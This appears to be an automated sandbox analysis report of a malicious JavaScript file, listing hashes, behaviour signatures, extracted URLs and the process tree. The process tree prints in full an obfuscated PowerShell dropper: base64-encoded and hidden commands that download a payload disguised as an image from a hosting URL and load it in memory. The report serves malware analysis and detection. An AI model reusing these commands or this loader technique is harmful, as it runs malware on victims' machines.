Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    11-12-2024 02:40

General

  • Target

    5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c.js

  • Size

    226KB

  • MD5

    9e63c086b6be3311a1bdaed1267e34e3

  • SHA1

    54a735620f68a8f91858058197bdf1336cc6d0ba

  • SHA256

    5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c

  • SHA512

    b377ae7cab1808ebfc38f7eb4fba7d50a401e60f700a5f8a6d3830eda9161f207624b95f49c09fda65f0261d30d5db622679e764bfb372015a350188f3f928dd

  • SSDEEP

    6144:EGLdt3xLKZu3Y82AaRX5GLdt3xLKZurGLdt3xLKZu3Y82AaRX5GLdt3xLKZua:rLvhLKjZACULvhLKdLvhLKjZACULvhLE

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\5ebaadc4e362a1edba519f257315616eb0ffe4f42128d815c3aeada39569736c.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $proofread = 'JABlAHgAbwBkAGUAcgBtAGkAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAeQB0AGYAbAB0ADYAMQBuAC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADMAMQAzADQAOQA0ADcALwBiAGsAbABwAHkAcwBlAHkAZQB1AHQANABpAG0AcAB3ADUAMABuADEALgBqAHAAZwAgACcAOwAkAHAAZQBkAGUAcwB0AGEAbABsAGUAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGEAeABpAG0AYQBsAGkAcwB0ACAAPQAgACQAcABlAGQAZQBzAHQAYQBsAGwAZQBkAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGUAeABvAGQAZQByAG0AaQBzACkAOwAkAGQAZQBiAGkAbABpAHQAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABtAGEAeABpAG0AYQBsAGkAcwB0ACkAOwAkAGkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAYwBhAGwAawBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAbwBwAGUAcgBhAHQAaQB2AGUAbAB5ACAAPQAgACQAZABlAGIAaQBsAGkAdABpAGUAcwAuAEkAbgBkAGUAeABPAGYAKAAkAGkAbgB0AGUAcgBhAGMAdABpAHYAZQApADsAJABtAG8AYgBjAGEAcABzACAAPQAgACQAZABlAGIAaQBsAGkAdABpAGUAcwAuAEkAbgBkAGUAeABPAGYAKAAkAGMAYQBsAGsAZQByACkAOwAkAG8AcABlAHIAYQB0AGkAdgBlAGwAeQAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAG0AbwBiAGMAYQBwAHMAIAAtAGcAdAAgACQAbwBwAGUAcgBhAHQAaQB2AGUAbAB5ADsAJABvAHAAZQByAGEAdABpAHYAZQBsAHkAIAArAD0AIAAkAGkAbgB0AGUAcgBhAGMAdABpAHYAZQAuAEwAZQBuAGcAdABoADsAJAB3AGUAbABkAGUAcgBzACAAPQAgACQAbQBvAGIAYwBhAHAAcwAgAC0AIAAkAG8AcABlAHIAYQB0AGkAdgBlAGwAeQA7ACQAdABvAG4AZQBhAHIAbQAgAD0AIAAkAGQAZQBiAGkAbABpAHQAaQBlAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAbwBwAGUAcgBhAHQAaQB2AGUAbAB5ACwAIAAkAHcAZQBsAGQAZQByAHMAKQA7ACQAaABvAG4AbwByAGEAcgBpAGwAeQAgAD0AIAAtAGoAbwBpAG4AIAAoACQAdABvAG4AZQBhAHIAbQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAdABvAG4AZQBhAHIAbQAuAEwAZQBuAGcAdABoACkAXQA7ACQAdwByAGkAdABoAGUAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABoAG8AbgBvAHIAYQByAGkAbAB5ACkAOwAkAG0AaQBjAHIAbwBsAGkAdABlAHIAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB3AHIAaQB0AGgAZQBuACkAOwAkAHcAbwBvAGQAZQBuAG4AZQBzAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB3AG8AbwBkAGUAbgBuAGUAcwBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnAHQAeAB0AC4AcwBiAGsALwB2AGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ADUAYgAxAGIAYwAwAGQANAA1AGIANgAzADIAZQBiADkAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAgACcAJABkAG8AdQBnAGgAdABpAG4AZQBzAHMAJwAsACAAJwAkAGQAbwB1AGcAaAB0AGkAbgBlAHMAcwAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwAkAGQAbwB1AGcAaAB0AGkAbgBlAHMAcwAnACwAIAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnACQAZABvAHUAZwBoAHQAaQBuAGUAcwBzACcALAAnADEAJwAsACcAJABkAG8AdQBnAGgAdABpAG4AZQBzAHMAJwApACkAOwA=';$tonemes = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($proofread));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tonemes
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$exodermis = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$pedestalled = New-Object System.Net.WebClient;$maximalist = $pedestalled.DownloadData($exodermis);$debilities = [System.Text.Encoding]::UTF8.GetString($maximalist);$interactive = '<<BASE64_START>>';$calker = '<<BASE64_END>>';$operatively = $debilities.IndexOf($interactive);$mobcaps = $debilities.IndexOf($calker);$operatively -ge 0 -and $mobcaps -gt $operatively;$operatively += $interactive.Length;$welders = $mobcaps - $operatively;$tonearm = $debilities.Substring($operatively, $welders);$honorarily = -join ($tonearm.ToCharArray() | ForEach-Object { $_ })[-1..-($tonearm.Length)];$writhen = [System.Convert]::FromBase64String($honorarily);$microliters = [System.Reflection.Assembly]::Load($writhen);$woodenness = [dnlib.IO.Home].GetMethod('VAI');$woodenness.Invoke($null, @('txt.sbk/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth', '$doughtiness', '$doughtiness', '$doughtiness', 'MSBuild', '$doughtiness', '$doughtiness','$doughtiness','$doughtiness','$doughtiness','$doughtiness','$doughtiness','1','$doughtiness'));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2344

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabD6C1.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarD6F3.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    e7f7aa39313f40a1163ed6b8e66482ff

    SHA1

    f186a03ccb0adf911452471fdbdb0fd46daeeb4a

    SHA256

    2449d77b207efe6ac8eecd54a4c7845456775d0244e088226044765b1bd3370b

    SHA512

    4de079071c94d357afa35c54dc145883b571d2393a7be86f31a8b9129287db4d635c55ed6d88cbca3c3e63a17257f58f72085fb4d5d8c51a9aecd43eeda2cb08

  • memory/2052-7-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2052-8-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2052-9-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2052-10-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2052-4-0x000007FEF591E000-0x000007FEF591F000-memory.dmp

    Filesize

    4KB

  • memory/2052-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

  • memory/2052-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2052-50-0x000007FEF591E000-0x000007FEF591F000-memory.dmp

    Filesize

    4KB

  • memory/2052-51-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2052-55-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2344-54-0x000000001ACF0000-0x000000001AE48000-memory.dmp

    Filesize

    1.3MB